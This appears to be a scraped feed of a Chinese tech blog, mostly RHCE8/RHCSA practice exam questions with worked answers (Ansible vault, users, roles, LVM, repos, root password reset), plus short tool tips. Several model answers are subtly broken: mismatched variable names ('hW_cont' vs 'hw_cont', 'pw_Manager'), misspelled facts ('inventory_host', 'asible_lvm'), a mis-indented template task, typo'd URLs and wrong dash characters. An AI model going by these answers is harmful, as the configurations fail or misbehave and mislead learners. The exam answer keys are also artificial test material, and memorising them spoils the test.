]]> tools bingwallpapers 分享个 QQ空间相册批量导出原图插件 /archives/tools/QQzone-export.html 有时候需要批量下载自己或者好友 QQ空间的高清原图，一个个下载导出原图会比较慢，这里分享一个浏览器插件，可以很方便的批量下载 QQ空间的图片，极大的提高了工作效率，下面是项目地址，安装和用法都写得很详细

项目地址

https://github.com/ShunCai/QZoneExport

在线安装

安装好后点击右上角类似 QQ空间图标那个扩展然后勾选自己要保存的内容，开始下载即可

QQzone-export-0

]]> tools QZoneExport Navicat连接SQL Server提示 'IM002 Microsoft ODBC 驱动程序管理器未发现数据源名称并且未指定默认驱动程序' /archives/tools/Navicat-install-odbc-driver.html 首次使用Navicat，连接SQL server的时候如果没有安装对于的模块会提示 [IM002] [Microsoft][ODBC 驱动程序管理器] 未发现数据源名称并且未指定默认驱动程序 错误，

Navicat-install-odbc-driver-0

原因是没有安装对应的模块msodbcsql_64.msi，相关文件在程序根目录有提供，所以在安装目录找到对应文件安装即可。

★ 桌面Navicat图标——右键——打开文件位置

Navicat-install-odbc-driver-1

★ 双击打开msodbcsql_64.msi，安装的时候注意选择”Will be installed on local hard drive”

Navicat-install-odbc-driver-2

★ 安装完成后重新打开软件进行连接即可

]]> tools navicat odbc 更新Ansible库的密钥 /archives/linux/RHCE/Ansible-update-salaries.html RHCE8 练习题：更新Ansible库的密钥

按照下方所述，更新现有 Ansible库的密钥：

从 http://materials.example.com/cd/exam_rhce8/salaries.yml 下载Ansible库到 /home/student/ansible 目录
当前的库密码为 retent
新的库密码为 redhat
库使用新密码保持 加密状态

Answer

ansible-vault view salaries.yml 
#使用密码retent查看文件内容

ansible-vault rekey salaries.yml 
#首先输入旧密码，然后输入两次新密码进行修改

Ansible-update-salaries-0

验证

ansible-vault view salaries.yml

Ansible-update-salaries-1

]]> linux RHCE ansible RHCE 创建用户账户 /archives/linux/RHCE/Ansible-create-user.html RHCE8 练习题：创建用户账户

从 http://materials.example.com/cd/exam_rhce8/user_list.yml 下载要创建的用户的列表，并将它保存到/home/student/ansible 目录
在本次考试中使用在其他位置创建的密码库 /home/student/ansible/locker.yml 创建名为 /home/student/ansible/users.yml 的playbook ，从而按以下所述创建用户账户
职位描述为 developer 的用户应当：
- 在dev和test主机组中的受管节点上创建
- 从pw_developer变量分配密码
- 是补充组student的成员
职位描述为manager的用户应当：
- 在prod主机组中的受管节点上创建
- 从pw_manager变量分配密码
- 是补充组opsmgr的成员
密码采用 SHA512 hash 格式
您的 playbook 应能够在本次考试中使用在其他位置创建的库密码文件 /home/student/ansible/secret.txt 正常运行

Answer

wget http://materials.example.com/cd/exam_rhce8/user_list.yml

vim /home/student/ansible/users.yml

---
- name: create users
  hosts: dev,test,prod
  vars_files:
    - /home/student/ansible/locker.yml
    - /home/student/ansible/user_list.yml
  tasks:
    - name: create user and student group
      group:
        name: student
      loop: "{{ users }}"
      when: item.job == "developer" and (inventory_hostname in groups.dev or inventory_hostname in groups.test)
    - name: create user and pass
      user:
        name: "{{ item.name }}"
        password: "{{ pw_developer | password_hash('sha512') }}"
        groups: student
      loop: "{{ users }}"
      when: item.job == "developer" and (inventory_hostname in groups.dev or inventory_hostname in groups.test)

    - name: create opsmgr group
      group:
        name: opsmgr
      loop: "{{ users }}"
      when: item.job == "manager" and inventory_hostname in groups.prod
    - name: create user and password
      user:
        name: "{{ item.name }}"
        password: "{{ pw_manager | password_hash('sha512') }}"
        groups: opsmgr
      loop: "{{ users }}"
      when: item.job == "manager" and inventory_hostname in groups.prod

ansible-playbook users.yml --vault-password-file=secret.txt

验证

ansible  all -a 'tail -3 /etc/passwd'

Ansible-create-user-0

]]> linux RHCE Ansible RHCE create-user vault 创建密码库 /archives/linux/RHCE/Ansible-locker.html RHCE8 练习题：创建密码库

按照下方所述，创建一个Ansible库来存储用户密码：

库名为 /home/student/ansible/locker.yml
库中含有两个变量，名称如下：
- pw_developer , 值为 Imadev
- pw_manager , 值为 Imamgr
用于加密和解密该库的密码为 retent
密码存储在文件 /home/student/ansible/secret.txt 中

Answer

echo retent> /home/student/ansible/secret.txt

vim /home/student/ansible/locker.yml

---
pw_developer: Imadev
pw_Manager: Imangr

ansible-vault encrypt --vault-password-file=/home/student/ansible/secret.txt /home/student/ansible/locker.yml

或者

ansible-vault create --vault-password-file=/home/student/ansible/secret.txt /home/student/ansible/locker.yml

---
pw_developer: Imadev
pw_Manager: Imangr

验证

ansible-vault view /home/student/nsible/locker.yml
# 使用密码retent解密查看文件

]]> linux RHCE ansible RHCE vault 生成硬件报告 /archives/linux/RHCE/Ansible-hwreport.html RHCE8 练习题：生成硬件报告

创建一个名为 /home/student/ansible/hwreport.yml 的playbook，它将在所有受管节点上生成含有以下信息的输出文件 /root/hwreport.txt :

清单主机名称
以 MB 表示的总内存大小
BIOS 版本
磁盘设备 vda 的大小
磁盘设备 vdb 的大小
输出文件中的每一行格式为 key=value

您的playbook应当：

从 http://materials.example.com/cd/exam_rhce8/hwreport.empty 下载文件，并将它保存为 /root/hwreport.txt
硬件报告 /root/hwreport.txt 中应使用相应的值
如何硬件项不存在，相关的值应设为 NONE

Answer

vim /home/student/ansible/hwreport.yml

---
- name: create hwreport
  hosts: all
  vars:
    hw_all:
      - hw_name: HOSTNAME
        hW_cont: "{{ ansible_hostname | default('NONE',true) }}"
      - hw_name: BIOS_VERSION
        hW_cont: "{{ ansible_bios_version | default('NONE',true) }}"
      - hw_name: MEMORY
        hW_cont: "{{ ansible_memtotal_mb | default('NONE',true) }}"
      - hw_name: VDASIZE
        hW_cont: "{{ ansible_devices.vda.size | default('NONE',true) }}"
      - hw_name: VDBSIZE
        hW_cont: "{{ ansible_devices.vdb.size | default('NONE',true) }}"
  tasks:
    - name: download file
      get_url:
        url: http://materials.example.com/cd/exam_rhce8/hwreport.empty
        dest: /root/hwreport.txt
    - name: modify hwreport file
      lineinfile:
        path: /root/hwreport.txt
        regexp: "^{{item.hw_name}}"
        line: "{{ item.hw_name }}={{ item.hw_cont }}"
      loop: "{{ hw_all }}"

ansible-playbook hwreport.yml

验证

ansible all -a 'cat /root/hwreport.txt'

Ansible-hwreport-0

]]> linux RHCE Ansible RHCE 创建web内容目录 /archives/linux/RHCE/Ansible-webcontent.html RHCE8 练习题：创建web内容目录

按照下方所述，创建一个名为 /home/student/ansible/webcontent.yml 的 playbook：

该 playbook 在 dev 主机组中的受管节点上运行
创建符合下列要求的目录 /webdev
- 所有者为 webdev 组
- 具有常规权限：
  - owner = read + write + execute
  - group = read + write + execute
  - other = read + execute
- 具有特殊权限：设置组ID
用符号链接将 /var/www/html/webdev 链接到 /webdev
创建文件 /webdev/index.html 其中包含如下所示的单行文件：
- Development
在 dev 主机组中主机上浏览此目录（例如：http://servera.lab.example.com/webdev/ 将生成以下输出：
- Development

Answer

vim /home/student/ansible/webcontent.yml

---
- name: http is installed?
  hosts: dev
  roles:
    - apache
  tasks:
    - name: create web group
      group:
        name: webdev
    - name: create web dir
      file:
        path: /webdev
        state: directory
        group: webdev
        mode: 2775
        setype: httpd_sys_content_t
    - name: create link
      file:
        src: /webdev/
        dest: /var/www/html/webdev
        state: link
    - name: create file
      copy:
        content: "Development"
        dest: /webdev/index.html
        setype: httpd_sys_content_t

ansible-playbook webcontent.yml

验证

curl servera/webdev/

Ansible-webcontent-0

]]> linux RHCE ansible RHCE ansible-playbook webcontent 修改和使用playbook /archives/linux/RHCE/Ansible-issue.html RHCE8 练习题：修改文件内容

按照下方所述，创建名为 /home/student/ansible/issue.yml 的playbook：

该playbook将在 所有 清单主机上运行
该playbook会将 /etc/issue 的内容替换为下方所示的一行文本：
- 在 dev 主机组中的主机上，这行文本显示为： Development
- 在 test 主机组中的主机上，这行文本显示为： Test
- 在 prod 主机组中的主机上，这行文本显示为： Production

Answer

vim /home/student/ansible/issue.yml

- name: modify issue
  hosts: all 
  tasks:
    - name: modify issue
      copy:
        content: 'Development'
        dest: /etc/issue
      when: inventory_host in groups.dev
    - name: modify issue
      copy:
        content: 'Test'
        dest: /etc/issue
      when: inventory_host in groups.test
    - name: modify issue
      copy:
        content: 'Production'
        dest: /etc/issue
      when: inventory_host in groups.prod

ansible-playbook issue.yml

验证

ansible all -a 'cat /etc/issue'

Ansible-issue-0

]]> linux RHCE ansible ansible-playbook issue 解决wordpress文章中长链接或英文超出宽度 /archives/web/wordpress-word-wrap.html 很多时候，WordPress中文主题都可能在开发的时候，漏掉了对文章对英文的排版优化，出现几种情况：

长英文、长链接，溢出超过显示范围，没有换行
英文单词换行时，在单词中断开了

解决办法有两个：

1. 自动换行

word-wrap: break-word; 
word-break: normal;

2. 英文单词不拆词

word-break: keep-all;  //只能在半角空格或连字符处换行。
word-wrap: break-word; //当单词太长时，先尝试换行，换行后还是太长，单词内还可以换行。
white-space: pre-wrap; //保留所有的空格和回车，但是允许折行，注意：出现大量空白时，可不加。

一般来说，需要在属于文章内容的样式表中，增加以下的 css 样式，即可解决。

例子

未修改之前，链接过长超出屏幕，对于手机来说不是很友好，类似下载地址这些超长链接影响更大，

wordpress-word-wrap-0

我的主题是 KnowHow，我通过在style.css文件中添加达到效果

wordpress-word-wrap-1

通过后台主机编辑器进行css的修改

wordpress-word-wrap-2

修改完成以后的效果，完成预期

wordpress-word-wrap-3

参考 1: https://cloud.tencent.com/developer/article/1945244 “解决WordPress 文章英文单词溢出/单词断词等问题”

]]> web wordpress wordpress-word-wrap 生成主机文件 /archives/linux/RHCE/Ansible-create-file-with-hosts.html RHCE8 练习题：生成主机文件

将一个初始模板文件从 http://materials.example.com/cd/exam_rhce8/hosts.j2 下载到 /home/student/ansible 以便使用该模板文件生成以下文件：
- 针对每个清单主机包含一行内容，其格式与 /etc/hosts 相同
创建名为 /home/student/ansible/hosts.yml 的playbook ，它将使用此模板在 dev 主机组中的主机上生成文件 /etc/myhosts
- 该playbook运行后，dev 主机组中的主机上的文件 /etc/myhosts 应针对每个受管主机包含一行内容
- address fqdn hostname

Answer

下载模板并编辑

wget -O /home/student/ansible/hosts.j2 http://materials.exmaple.com/cd/exam_rhc8/hosts.j2

vim /home/student/ansible/hosts.j2

*****
*****
{% for host in groups.all %}
{{ hostvars[host].ansible_facts.default_ipv4.address }} {{ hostvars[host].ansible_facts.fqdn }} {{ hostvars[host].ansible_facts.hostname }}
{% endfor %}

编写hosts.yml

vim /home/student/ansible/hosts.yml

---
- name: create myhosts
  hosts: all
  tasks:
    - name: hosts.j2
      template:
        src: hosts.j2
        dest: /etc/myhosts
      when: inventory_hostname in groups.dev

ansible-playbook hosts.yml

验证

ansible dev -a 'cat /etc/myhosts'

Ansible-create-file-with-hosts-0

]]> linux RHCE ansible hosts template RHCE 创建和使用逻辑卷 /archives/linux/RHCE/Ansible-create-and-use-lv.html RHCE8 练习题：创建和使用逻辑卷

创建一个名为 /home/student/ansible/lv.yml 的 playbook，它将在所有受管节点上运行，以及执行下列任务：

创建符合以下要求的逻辑卷：
- 逻辑卷创建在 research 卷组中
- 逻辑卷名称为 data
- 逻辑卷大小为 5000MiB
使用 ext4 文件系统格式化逻辑卷
如果无法创建请求的逻辑卷大小，应显示错误信息
- Could not create logical volume of that size
- 并且应改为使用大小 800MiB
如果卷组 research 不存在，应显示错误信息，
- Volume group done not exist
不要以任何方式挂载逻辑卷

Answer

vim /home/student/ansible/lv.yml

---
- name: create lv
  hosts: all
  tasks:
    - name: create lv
      block:
        - name: create lv 5000m
          lvol:
            lv: data
            vg: research
            size: 5000m
      rescue:
        - name: error 5000m
          debug:
            msg: "Could not create logical volume of that size"
        - name: create lv 800m
          lvol:
            lv: data
            vg: research
            size: 800m
      always: 
        - name: format filesystem
          filesystem:
            fstype: ext4
            dev: /dev/research/data
      when: ansible_lvm.vgs.research is defined
    - name: research is not exist
      debug:
        msg: "Volume group done not exist" 
      when: asible_lvm.vgs.research is not defined

ansible-playbook lv.yml

验证

ansible all  -a 'lvs'

Ansible-create-and-use-lv-0

]]> linux RHCE ansible RHCE lvm Ansible Galaxy使用角色 /archives/linux/RHCE/Ansible-use-roles.html RHCE8 练习题：从Ansible Galaxy使用角色

根据下列要求，创建一个名为 /home/student/ansible/roles.yml 的 playbook ：

playbook 中包含一个play，该play在 balancers 主机组中的主机上运行，并使用 balancer 角色
- 此角色配置一项服务，以在 webservers 主机组中的主机之间做 web负载均衡
- balancers 主机组中的主机浏览 http://workstation.lab.example.com 会在 webservers 主机组之间进行切换
playbook中包含一个play，该play在 webservers 主机组中主机上运行并使用 phpinfo 角色
- 通过URL /hello.php 浏览到 webservers 主机组中的主机将生成以下输出：
  - Hello PHP World from FQDN
  - 其中FQDN是主机完全限定名称
- 例如：访问 http://serverc.lab.example.com/hello.php 会生成以下输出：
  - PHP World from serverc.example.com
  - phpinfo......

Answer

vim /home/student/ansible/roles.yml

---
- name: gater facts
  hosts: webservers

- name: use balancer
  hosts: balancers
  roles:
    - balancer

- name: use phpinfo
  hosts: webservers
  roles:
    - phpinfo

ansible-playbook roles.yml

验证

curl workstation  #每次访问IP会进行切换，达到负载均衡
curl serverc/hello.php | head 1 # 查看内容，或者通过浏览器查看
firefox serverc.lab.example.com/hello.php

Ansible-use-roles-0

]]> linux RHCE Ansible RHCE Andsible 创建和使用角色 /archives/linux/RHCE/Ansible-create-roles.html RHCE8 练习题：创建和使用角色

根据下列要求在 /home/student/ansible/roles 中创建名为 apache 的角色：

httpd 软件包已安装，设为在系统启动时**自动启动**
防火墙已启用并正在运行，并使用 允许访问 web服务器 的规则
模板文件 index.html.j2 用于创建 /var/www/html/index.html 具有以下输出内容：
- Welcome to HOSTNAME on IPADDRESS
- HOSTNAME　是受管节点的完全限定域名，
- IPADDRESS　是受管节点的IP地址
按照下方所属，创建一个使用此角色的playbook，/home/student/ansible/newrole.yml
- 该playbook 在 webservers 主机组中的主机上运行

Answer

创建apache角色并编辑

cd /home/student/ansible/roles
ansible-galaxy init apache

vim apache/tasks/main.yml

---
- name: install apache
  yum:
    name: httpd
- name: start httpd firewalld
  service: 
    name: "{{ item }}"
    state: started
    enabled: yes
  loop:
    - httpd
    - firewalld
- name: firewalld port add
  firewalld:
    service: http
    immediate: yes
    permanent: yes
    state: enabled
- name: j2 template
  template:
  src: index.html.j2
  dest: /var/www/html/index.html

newrole.yml playbook 编写

vim /home/student/ansible/newrole.yml

---
- name: start apache
  hosts: webservers
  roles:
    - apache

模板文件index.html.j2

vim /home/student/ansible/roles/apache/templates/index.html.j2

Welcome to {{ ansible_fqdn }} on {{ansible_default_ipv4.address}}

ansible-playbook newrole.yml

验证

curl serverc
curl serverd

Ansible-create-use-roles-1

]]> linux RHCE ansible RHCE ansible-role 使用Ansible Galaxy下载安装角色 /archives/linux/RHCE/Ansible-galaxy.html RHCE8 练习题：使用 Ansible Galaxy 下载角色

使用 Ansible Galaxy 和要求文件 /home/student/ansible/roles/requirements.yml 从以下URL下载角色并安装到 /home/student/ansible/roles:

http://materials.example.com/cd/exam_rhce8/haproxy.tar 此角色的名称应当为 balancer
http://materials.example.com/cd/exam_rhce8/phpinfo.tar 此角色的名称应该为 phpinfo

Answer

vim /home/student/ansible/roles/requirements.yml

---
- src: http://materials.example.com/cd/exam_rhce8/haproxy.tar
  name: balancer
- src: http://materials.example.com/cd/exam_rhce8/phpinfo.tar
  name: phpinfo

cd /home/student/ansible
ansible-galaxy install -r roles/requirements.yml

验证

ll roles/
ansible-galaxy list

Ansible-galaxy-0

]]> linux RHCE Ansible RHCE Ansible-Galaxy 使用RHEL系统角色timesync /archives/linux/RHCE/Ansible-system-roles.html RHCE8 练习题：使用RHEL系统角色

安装RHEL系统角色软件包，并创建名称为 /home/student/ansible/timesync.yml ,符合以下条件的 playbook

在所有受管节点上运行
使用 timesync
配置该角色，以使用当前有效的NTP
配置该角色，以使用时间服务器 172.25.254.254
配置该角色，以启用 iburst 参数

Answer

安装RHEL系统角色并复制到 ansible/roles下

sudo yum -y install rhel-system-roles
mkdir roles
cp -a /usr/share/ansible/roles/rhel-system-roles.timesync roles/timesync
ansible-galaxy list #查看是否列出

编写playbook

vim timesync.yml

---
- name: use timesync
  hosts: all
  vars:
    timesync_ntp_servers:
      - hostname: 172.25.254.254
        iburst: yes
  roles:
    - timesync

ansible-playbook timesync.yml

验证

ansible all -a 'chronyc sources -v'

Ansible-system-roles-1

]]> linux RHCE RHCE RHEL timesync system-role iburst Ansible安装软件包 /archives/linux/RHCE/Ansible-install-soft.html RHCE8 练习题：安装软件包

创建一个名为 /home/student/ansible/packages.yml 的 playbook：

将 php 和 mariadb 软件包安装到 dev , test 和 prod 主机组中的主机上
将 RPM Development Tools 软件包组安装到 **dev**主机组中的主机上
将 **dev**主机组中主机上的所有软件包啊更新为最新版本

playbook检查和使用yml

ansible-playbook xxx.yml --syntax-check
ansible-playbook xxx.yml

Answer

vim /home/student/ansible/packages.yml

---
- name: install packages
  hosts: dev,test,prod
  tasks:
    - name: install php mariadb
      yum:
        name: php,mariadb
    - name: install packages groups
      yum:
        name: "@RPM Development Tools"
      when: inventory_hostname in groups['dev']
    - name: upgrade all packages
      yum:
        name: '*'
        state: latest
      when: inventory_hostname in groups.dev

ansible-playbook packages.yml

验证

ansible dev -m shell -a "rpm -qa | grep php "

Ansible_install_soft-1

]]> linux RHCE Ansible RHCE 创建和运行Ansible临时命令 /archives/linux/RHCE/Ansible-adhoc.html RHCE8 练习题：创建和运行Ansible临时命令

作为系统管理员，您需要在受管节点上安装软件。按照正文所述，创建一个名为 /home/student/ansible/adhoc.sh 的shell脚本，该脚本将使用ansible临时命令在各个受管节点上安装yum存储库。

储存库1
- 存储库的名称为 EX294_BASE
- 描述为 EX294 base software
- 基础URL为 http://content.example.com/rhel8.0/x86_64/dvd/BaseOS
- GPG 签名检查为： 启用状态
- GPG 密钥URL为 http://content.example.com/rhel8.0/x86_64/dvd/RPM-GPG-KEY-redhat-release
- 存储库状态为： 启用状态
储存库2
- 存储库的名称为 EX294_STREAM
- 描述为 EX294 stream software
- 基础URL为 http://content.example.com/rhel8.0/x86_64/dvd/AppStream
- GPG 签名检查为： 启用状态
- GPG 密钥URL为 http://content.example.com/rhel8.0/x86_64/dvd/RPM-GPG-KEY-redhat-release
- 存储库状态为： 启用状态

查找模块及模块详细信息

ansible-doc -l | grep xxx
ansible-doc xxx
ansible 主机或主机组 -m  模块名 -a 命令或命令组

Answer

cd ~/ansible
vim adhoc.sh ####符号中为文件内容

#!/bin/bash
ansible all \
    -m yum_repository \
    -a 'name="EX294_BASE" \
        description="EX294 base softeware" \
        baseurl="http://content.example.com/rhel8.0/x86_64/dvd/BaseOS" \
        enabled=yes \
        gpgcheck=yes \
        gpgkey="http://content.example.com/rhel8.0/x86_64/dvd/RPM-GPG-KEY-redhat-release"'
ansible all \
    -m yum_repository \
    -a 'name="EX294_STREAM" \
        description="EX294 stream software" \
        baseurl="http://content.example.com/rhel8.0/x86_64/dvd/AppStream" \
        enabled=yes \
        gpgcheck=yes \
        gpgkey="http://content.example.com/rhel8.0/x86_64/dvd/RPM-GPG-KEY-redhat-release"'

bash adhoc.sh

验证

ansible all -a 'yum repolist'
ansible test -m shell -a 'yum list|wc -l'

Ansible_adhoc-3

]]> linux RHCE Ansible adhoc RHCE8练习题1. 安装配置Ansible /archives/linux/RHCE/Ansible-install-and-setting.html RHCE8 练习题：安装配置Ansible

按照下方所述，在控制节点 control.example.com上安装和配置ansible：

按照所需的软件包
创建名为 /home/student/ansible/inventory 的静态清单文件，以满足下以下要求：
- servera 是 dev 主机组的成员
- serverb 是 test 主机组的成员
- serverc serverd 是 prod 主机组的成员
- workstation 是 balancers 主机组的成员
- prod组是 webservers 主机组的成员
创建名为 /home/student/ansible/ansible.cfg 的配置文件，以满足以下要求：
- 主机清单文件为 /home/student/ansible/inventory
- playbook中使用的角色的位置包括 /home/student/ansible/roles

Answer

开启所有虚拟主机

rht-vmctl start all
rht-vmctl status all     #查看虚拟主机状态
rht-vmctl restart xxxx   #重启某台虚拟主机
rht-vmctl stop all       #停止所有虚拟主机

安装ansible

ssh bastion
sudo yum install epel-relase -y
sudo yum install ansible -y

创建文件夹并配置tab为两个空格

mkdir $HOME/ansible && cd $_ 或者 mkdir ~/ansible && cd $_
echo "set ts=2 ai" >> ~/.vimrc
source ~/.vimrc

创建并编辑文件

vim inventory ####符号中为文件内容

[dev]
servera
[test]
serverb
[prod]
serverc
serverd
[balancers]
workstation
[webservers:children]
prod

vim ansible.cfg

[defaults]
inventory=/home/student/ansible/inventory
roles_path=/home/student/ansible/roles
#提升权限
[privilege_escalation]
become=True
become_method=sudo
become_user=root
become_ask_pass=False

验证

ansible all -m ping

install-and-setting-Ansible-0

]]> linux RHCE ansible rhce Rocky Linux修改默认源为国内源 /archives/linux/modify-rocky-repo.html 1. 备份现有的 YUM 源配置文件

首先，建议备份现有的 YUM 源配置文件，以防需要恢复：

sudo cp /etc/yum.repos.d/Rocky-*.repo /etc/yum.repos.d/backup/

2. 编辑 YUM 源配置文件

接下来，你可以编辑 /etc/yum.repos.d/ 目录下的 .repo 文件，或直接替换为其他镜像源。例如，可以将默认的 Rocky Linux 源替换为阿里云源。

替换为阿里云源

首先，删除现有的 .repo 文件（如果需要）：

sudo rm -f /etc/yum.repos.d/Rocky-*.repo

然后，下载阿里云的 Rocky Linux 源配置文件：

sudo wget -O /etc/yum.repos.d/Rocky-BaseOS.repo https://mirrors.aliyun.com/repo/Rocky-BaseOS.repo
sudo wget -O /etc/yum.repos.d/Rocky-AppStream.repo https://mirrors.aliyun.com/repo/Rocky-AppStream.repo

3. 清理缓存并更新软件包索引

替换完源后，执行以下命令清理缓存并更新软件包索引：

sudo dnf clean all
sudo dnf makecache

4. 验证源是否已成功更改

你可以使用以下命令验证新的源是否生效：

sudo dnf repolist

这将列出已启用的源，并显示其对应的镜像 URL。

常用国内镜像源

以下是一些常用的 Rocky Linux 镜像源，你可以选择合适的替换：

阿里云: https://mirrors.aliyun.com
清华大学开源软件镜像站: https://mirrors.tuna.tsinghua.edu.cn
中国科技大学开源软件镜像站: https://mirrors.ustc.edu.cn

你可以根据需要选择其他镜像源，并修改 .repo 文件中的 baseurl 以指向相应的镜像。

]]> linux rocky linux repo IIS添加FTP及添加被动端口 /archives/web/iis-add-ftp-port.html Windows server服务器中 IIS 使用自带的FTP发布站点

流程

添加用户，
站点文件夹添加用户权限，
添加ftp发布，并选择相应的用户
添加被动端口范围
添加防火墙例外
重启ftp服务

iis-add-ftp-port-1

iis-add-ftp-port-2

iis-add-ftp-port-3

iis-add-ftp-port-4

iis-add-ftp-port-5

iis-add-ftp-port-6

iis-add-ftp-port-7

]]> web ftp iis podman /archives/linux/RHCSA/podman.html RHCSA练习题21-22 ：podman部署容器

二十一：配置容器以使其自动启动

按以下要求部署容器:

使用容器注册服务器上的 rsyslog 镜像，创建一个名为 logserver 的容器
将容器配置为以 systemd 服务的形式运行，且仅面向现有用户 containers
该服务应命名为 container-logserver , 并在系统重新引导后自动启动，而无需任何干预

二十二：为容器配置持久存储

通过以下方式扩展上一个任务的服务:

配置主机系统日志以在系统更新引导后保留其数据，并重新启动日志记录服务
将主机 /var/log/journal 目录及任何子目录中的任何 *.journal 文件复制到目录 /home/containers/container_journal 中
将服务配置为在启动时自动将目录 /home/containers/container_ journal 挂载到容器的 /var/log/journal 下面

Answer

因为这两个题彼此关联，所以放在一起来解答

流程：
    - containers用户则建立
    - 编辑/etc/systemd/journal.conf文件
    - 设置persisent永久存储
    - 重启systemd-journald服务
    - 建立文件夹，复制相关文件到相应路径
    - 安装podman
    - 登陆
    - 搜索和拉取相应容器
    - 设置容器目录，名字
    - 生成服务文件
    - 创建服务
    - 设置linger在启动时自动启动容器

验证

reboot然后查看容器是否自动启动

podman ps

]]> linux RHCSA podman tuned设置 /archives/linux/RHCSA/set-tuned.html RHCSA练习题20 ：tuned设置

在 venus.lab.example.com 上执行

为您的系统选择建议的tuned配置集并将它设为默认设置

Answer

tuned-adm profile `tuned-adm recommend`

验证

tuned-adm ative

set-tuned-0

]]> linux RHCSA tuned 创建vdo卷并开机自动挂载 /archives/linux/RHCSA/create-vdo.html RHCSA练习题19 : 创建vdo卷并开机自动挂载

在 venus.lab.example.com 上执行根据如下要求

创建新的VDO卷：

使用未分区的磁盘
该卷的名称为vdough
该卷的逻辑大小为50G
该卷使用xfs文件系统格式化
该卷（在系统启动时）挂载到/vbread下

Answer

这里以vdc为例，使用vdc传教vdo卷查看磁盘分区情况

lsblk

create-vdo-0

安装vdo，创建vdo卷，并挂载

yum install vdo kmod-kvdo
systemctl enable vdo –now
vdo create -–name=vdough -–device=/dev/vdc -–vdoLogicalSize=50G
mkfs.xfs -K /dev/mapper/vdough
mkdir /vbread
echo "/dev/mapper/vdough /vbread xfs defaults,x-systemd.requires=vdo.service 0 0" >> /etc/fstab

验证

reboot 看是否正常

df -hT

create-vdo-1

]]> linux RHCSA vdo 创建逻辑卷并自动挂载 /archives/linux/RHCSA/create-lvs.html RHCSA练习题18 创建逻辑卷并自动挂载

在 venus.lab.example.com 上执行根据如下要求，创建新的逻辑卷：

逻辑卷取名为 qa ，属于 qagroup 卷组，大小为 60个 扩展块
qagroup 卷组中逻辑卷的扩展块大小应当为 16MiB
使用 ext3 文件系统格式化新逻辑卷。该逻辑卷应在系统启动时自动挂载到 /mnt/qa 下

Answer

下面依然在vdb上面演示，vdb剩余3G多

lsblk

create-lvs-0

创建逻辑分区，并创建1G逻辑分区用于创建逻辑卷，创建1G，是因为上面的60*16=960M

fdisk /dev/vdb

create-lvs-1

刷新分区表

partx -d /dev/vdb
partx -a /dev/vdb

创建逻辑卷

pvcreate /dev/vdb5
vgcreate qagroup /dev/vdb5 -s 16M
vgs
lvcreate -l 60 -n qa qagroup
lvs

create-lvs-2

创建文件夹，格式化逻辑卷并挂载

mkdir /mnt/qa
mkfs.ext3 /dev/qagroup/qa
echo "/dev/qagroup/qa /mnt/qa ext3 defaults 0 0" >> /etc/fstab
mount -a

create-lvs-3

验证

df -hT

create-lvs-4

]]> linux RHCSA lvs pv 添加和设置swap交换分区 /archives/linux/RHCSA/set-swap.html RHCSA练习题17：添加设置swap交换分区

在 venus.lab.example.com 上执行

向您的系统添加一个额外的交换分区756MiB
交换分区应在系统启动时自动挂载
不要删除或以任何方式改动系统上的任何现有交换分区

Answer

下面以vdb举例，vdb大小为5G，还剩余4G多查看磁盘空间使用情况，并新建一块分区

lsblk

set-swap-0

新建一个756M大小分区

fdisk /dev/vdb

set-swap-1

n——》——》 ——》+756M——》w

设置交换分区，并设置开机启动

mkswap /dev/vdb3
echo "/dev/vdb3 swap swap defaults 0 0" >> /etc/fstab
swapon /dev/vdb3

验证

swapon -s
free -m

set-swap-2

]]> linux RHCSA swap 交换分区扩容逻辑卷 /archives/linux/RHCSA/extend-lvm.html RHCSA练习题16 : 扩展逻辑卷

在 venus.lab.example.com 上执行

将逻辑卷lilylv及其文件系统的大小调整到230MiB。
确保文件系统内容保持不变。

注：分区大小很少与请求的大小完全相同，因此可以接受范围为217MiB到243MiB的大小。

Answer

lvs
lvextend -r -L 230M /dev/lilyvg/lilylv

验证

lvs
df -hT

extend-lvm-0
extend-lvm-1

]]> linux RHCSA lvs lvextend 扩容逻辑卷配置yum源，scp复制文件 /archives/linux/RHCSA/yum-repo-scp.html RHCSA练习题练习题15：配置yum源, scp复制文件

在 venus.lab.example.com上配置YUM仓库，以将这些位置用作默认存储库

http://content.example.com/rhel8.0/x86_64/dvd/BaseOS

http://content.example.com/rhel8.0/x86_64/dvd/AppStream

Answer

方法一：手动配置
参考RHCSA考题二：配置yum源
方法二：复制servera 上面的配置文件

scp root@mars:/etc/yum.repos.d/redhat.repo /etc/yum.repos.d/

验证

yum repolist
yum list|wc -l

yum-repo-scp-0

]]> linux RHCSA repo yum scp 破解root密码 /archives/linux/RHCSA/crack-root-password.html RHCSA练习题14 破解root密码

在 venus.lab.example.com 上执行

将 venus 的 root 密码设置为 redhat 。您需要获得系统访问权限才能进行此操作

Answer

重新启动 serverb 的时候按 e ，进入 grub 编辑模式，倒数第二行，输入 rd.break console=tty0 然后按 Ctrl+x 引导系统

重启
crack-root-password-0

重启后按 e 进入 grub
crack-root-password-1

写好后按 Ctrl+x 引导系统进行密码修改
crack-root-password-2

mount -o rw,remount /sysroot
chroot /sysroot
echo redhat| passwd –stdin root
touch /.autorelabel
exit
exit

验证

ssh root@venus

crack-root-password-3

]]> linux RHCSA 破解密码 grub tar压缩文件 /archives/linux/RHCSA/tar-compression-file.html RHCSA练习题13：tar压缩文件

在 mars.lab.example.com 上执行

创建一个名为 /root/backup.tar.gz 的tar存档，其应包含 /usr/local 的内容。该tar存档使用 gzip 进行压缩

提示：

tar
 -c tar
 -z gzip
 -j bz2
 -J xz

Answer

tar -zcvf /root/backup.tar.gz /usr/local/

验证

file /root/backup.tar.gz

tar-compression-file-0

]]> linux RHCSA tar grep匹配字符串 /archives/linux/RHCSA/grep-string.html RHCSA练习题12：grep匹配字符串

在 mars.lab.example.com上执行

查找文件 /usr/share/doc/words/readme.txt 中包含字符串 crosswords 的所有行。
将所有这些行的副本按原始顺序放在文件/root/list中。
/root/list不得包含空行，且所有行必须是 /usr/share/doc/words/readme.txt 中原始行的确切副本

Answer

grep crosswords /usr/share/doc/words/readme.txt > /root/list

验证

more /root/list

grep-string-0

]]> linux RHCSA grep find查找文件 /archives/linux/RHCSA/find-search_file.html RHCSA练习题11：find查找文件

在 mars.lab.example.com上执行

查找用户 querys 所有的所有文件并将其副本放入 /root/findfiles 目录。

Answer

mkdir findfiles
find / -user querys -exec cp -a {} /root/findfiles \;

验证

ll /root/findfiles

find-search_file-0

如果练习环境没有 querys 权限的文件，可以手动建立一个,然后再进行文件查找验证

echo 123123 > /tmp/123 && chown queyrs:querys /tmp/123

